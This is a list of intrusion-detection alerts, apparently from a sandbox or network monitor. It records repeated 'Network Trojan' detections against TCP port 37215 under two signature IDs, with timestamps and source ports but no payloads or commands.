                Timestamp:05/29/24-15:15:50.702237
                SID:2835222
                Source Port:58732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521308
                SID:2835222
                Source Port:35910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666991
                SID:2829579
                Source Port:39644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.811577
                SID:2835222
                Source Port:42364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.806042
                SID:2835222
                Source Port:50772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436568
                SID:2829579
                Source Port:38724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.278161
                SID:2829579
                Source Port:48608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764279
                SID:2829579
                Source Port:34178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560037
                SID:2835222
                Source Port:41876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901135
                SID:2835222
                Source Port:51780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843978
                SID:2835222
                Source Port:50578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945220
                SID:2835222
                Source Port:44384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791775
                SID:2835222
                Source Port:33738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919579
                SID:2835222
                Source Port:42878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809420
                SID:2829579
                Source Port:39988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.545569
                SID:2829579
                Source Port:57832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716316
                SID:2829579
                Source Port:32902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.928180
                SID:2829579
                Source Port:33790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559764
                SID:2835222
                Source Port:44344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209599
                SID:2835222
                Source Port:46286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809311
                SID:2835222
                Source Port:52442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.460408
                SID:2835222
                Source Port:40356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559081
                SID:2835222
                Source Port:48154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702174
                SID:2829579
                Source Port:56504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794195
                SID:2835222
                Source Port:41616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.612962
                SID:2829579
                Source Port:36904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.963170
                SID:2829579
                Source Port:59450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.744720
                SID:2835222
                Source Port:41180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613956
                SID:2829579
                Source Port:42952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433846
                SID:2829579
                Source Port:57582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.431230
                SID:2835222
                Source Port:53054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287606
                SID:2835222
                Source Port:43480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282009
                SID:2829579
                Source Port:52026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262470
                SID:2835222
                Source Port:39732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665286
                SID:2835222
                Source Port:56726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897216
                SID:2835222
                Source Port:60254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989638
                SID:2835222
                Source Port:40046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809258
                SID:2829579
                Source Port:33114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432314
                SID:2835222
                Source Port:47288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074928
                SID:2829579
                Source Port:39542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784705
                SID:2835222
                Source Port:54254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209414
                SID:2829579
                Source Port:35612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.716339
                SID:2835222
                Source Port:51318
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572534
                SID:2829579
                Source Port:52880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381118
                SID:2829579
                Source Port:35230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.871775
                SID:2829579
                Source Port:39392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273797
                SID:2829579
                Source Port:40482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.982826
                SID:2835222
                Source Port:35020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763695
                SID:2829579
                Source Port:55748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872971
                SID:2829579
                Source Port:41976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032349
                SID:2835222
                Source Port:56350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.874831
                SID:2835222
                Source Port:52558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557932
                SID:2835222
                Source Port:41282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443970
                SID:2829579
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519100
                SID:2835222
                Source Port:34410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.090995
                SID:2835222
                Source Port:42590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.798221
                SID:2835222
                Source Port:42136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665177
                SID:2829579
                Source Port:35574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180301
                SID:2835222
                Source Port:42256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437179
                SID:2835222
                Source Port:57994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074591
                SID:2835222
                Source Port:36650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584149
                SID:2835222
                Source Port:39058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369515
                SID:2835222
                Source Port:34708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685001
                SID:2835222
                Source Port:42452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.811702
                SID:2829579
                Source Port:55092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.978047
                SID:2835222
                Source Port:47006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363061
                SID:2829579
                Source Port:44094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962326
                SID:2835222
                Source Port:54860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887863
                SID:2829579
                Source Port:44118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335983
                SID:2835222
                Source Port:34922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555413
                SID:2835222
                Source Port:49582
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262040
                SID:2835222
                Source Port:48344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813408
                SID:2829579
                Source Port:33866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687071
                SID:2829579
                Source Port:49152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.224368
                SID:2829579
                Source Port:54242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665962
                SID:2835222
                Source Port:35574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.596716
                SID:2829579
                Source Port:60344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.174008
                SID:2835222
                Source Port:58818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.886279
                SID:2829579
                Source Port:33774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915367
                SID:2835222
                Source Port:41316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209613
                SID:2835222
                Source Port:50920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941185
                SID:2829579
                Source Port:54796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617438
                SID:2829579
                Source Port:52878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650059
                SID:2835222
                Source Port:36244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899552
                SID:2835222
                Source Port:51356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962736
                SID:2829579
                Source Port:56028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467492
                SID:2835222
                Source Port:34694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973157
                SID:2829579
                Source Port:36774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738320
                SID:2829579
                Source Port:42920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225210
                SID:2835222
                Source Port:49416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848828
                SID:2835222
                Source Port:48408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766296
                SID:2829579
                Source Port:36664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032309
                SID:2835222
                Source Port:50802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009703
                SID:2835222
                Source Port:40874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561769
                SID:2829579
                Source Port:43464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962971
                SID:2835222
                Source Port:45430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665565
                SID:2829579
                Source Port:50300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.092697
                SID:2835222
                Source Port:34560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.059865
                SID:2829579
                Source Port:57580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660155
                SID:2835222
                Source Port:53048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500152
                SID:2829579
                Source Port:36368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037456
                SID:2829579
                Source Port:58792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764126
                SID:2835222
                Source Port:37330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136876
                SID:2835222
                Source Port:46706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514701
                SID:2829579
                Source Port:41380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966253
                SID:2829579
                Source Port:37256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.144894
                SID:2829579
                Source Port:34416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.722447
                SID:2829579
                Source Port:47248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026435
                SID:2835222
                Source Port:42404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227447
                SID:2835222
                Source Port:50294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.717989
                SID:2835222
                Source Port:35198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265707
                SID:2835222
                Source Port:38162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.983919
                SID:2835222
                Source Port:46018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782460
                SID:2829579
                Source Port:54312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.091694
                SID:2835222
                Source Port:49548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895556
                SID:2829579
                Source Port:49400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701313
                SID:2835222
                Source Port:35650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166415
                SID:2829579
                Source Port:46580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948582
                SID:2829579
                Source Port:46926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462360
                SID:2829579
                Source Port:33234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464729
                SID:2829579
                Source Port:51186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950222
                SID:2829579
                Source Port:50184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.589642
                SID:2829579
                Source Port:35622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.590972
                SID:2829579
                Source Port:49726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617516
                SID:2835222
                Source Port:36010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227515
                SID:2829579
                Source Port:43460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.856062
                SID:2835222
                Source Port:55322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166376
                SID:2829579
                Source Port:42946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881825
                SID:2835222
                Source Port:45250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611175
                SID:2829579
                Source Port:56930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.648490
                SID:2829579
                Source Port:36038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840212
                SID:2829579
                Source Port:35922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908426
                SID:2829579
                Source Port:46790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207926
                SID:2835222
                Source Port:52276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981443
                SID:2835222
                Source Port:48638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.796023
                SID:2835222
                Source Port:41624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841040
                SID:2829579
                Source Port:43980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.926640
                SID:2829579
                Source Port:34644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163582
                SID:2829579
                Source Port:54838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509719
                SID:2829579
                Source Port:52120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221868
                SID:2829579
                Source Port:40842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981513
                SID:2835222
                Source Port:57758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.868731
                SID:2829579
                Source Port:34560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809732
                SID:2835222
                Source Port:49352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666392
                SID:2835222
                Source Port:42308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.723554
                SID:2829579
                Source Port:49980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441082
                SID:2835222
                Source Port:54670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660204
                SID:2835222
                Source Port:57680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.545184
                SID:2829579
                Source Port:47106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184214
                SID:2835222
                Source Port:46438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220831
                SID:2835222
                Source Port:35102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324899
                SID:2835222
                Source Port:43476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807216
                SID:2829579
                Source Port:48750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.388584
                SID:2829579
                Source Port:35806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179966
                SID:2829579
                Source Port:33616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946739
                SID:2835222
                Source Port:47902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166853
                SID:2829579
                Source Port:42588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520686
                SID:2835222
                Source Port:54896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.133650
                SID:2829579
                Source Port:57954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909847
                SID:2829579
                Source Port:54128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.441172
                SID:2829579
                Source Port:40188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584845
                SID:2835222
                Source Port:52188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861907
                SID:2829579
                Source Port:56550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899676
                SID:2829579
                Source Port:37178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993761
                SID:2829579
                Source Port:56564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653812
                SID:2835222
                Source Port:36314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985342
                SID:2835222
                Source Port:54796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281753
                SID:2829579
                Source Port:56430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.899633
                SID:2835222
                Source Port:36544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.806312
                SID:2835222
                Source Port:40026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470245
                SID:2829579
                Source Port:42744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614246
                SID:2835222
                Source Port:59004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.861895
                SID:2829579
                Source Port:57214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422442
                SID:2829579
                Source Port:45090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267764
                SID:2835222
                Source Port:57908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166697
                SID:2835222
                Source Port:53406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182781
                SID:2835222
                Source Port:38796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779534
                SID:2829579
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072370
                SID:2835222
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267648
                SID:2829579
                Source Port:45686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418153
                SID:2829579
                Source Port:38544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222842
                SID:2829579
                Source Port:41030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763282
                SID:2829579
                Source Port:35738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970447
                SID:2835222
                Source Port:45990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071769
                SID:2835222
                Source Port:46892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618692
                SID:2835222
                Source Port:39312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385105
                SID:2829579
                Source Port:38878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582935
                SID:2829579
                Source Port:36720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845314
                SID:2829579
                Source Port:51156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915455
                SID:2829579
                Source Port:50160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983125
                SID:2835222
                Source Port:51660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783147
                SID:2835222
                Source Port:40176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422533
                SID:2829579
                Source Port:53942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264880
                SID:2829579
                Source Port:47476
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281369
                SID:2835222
                Source Port:58974
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073691
                SID:2829579
                Source Port:39900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513846
                SID:2835222
                Source Port:48592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.683578
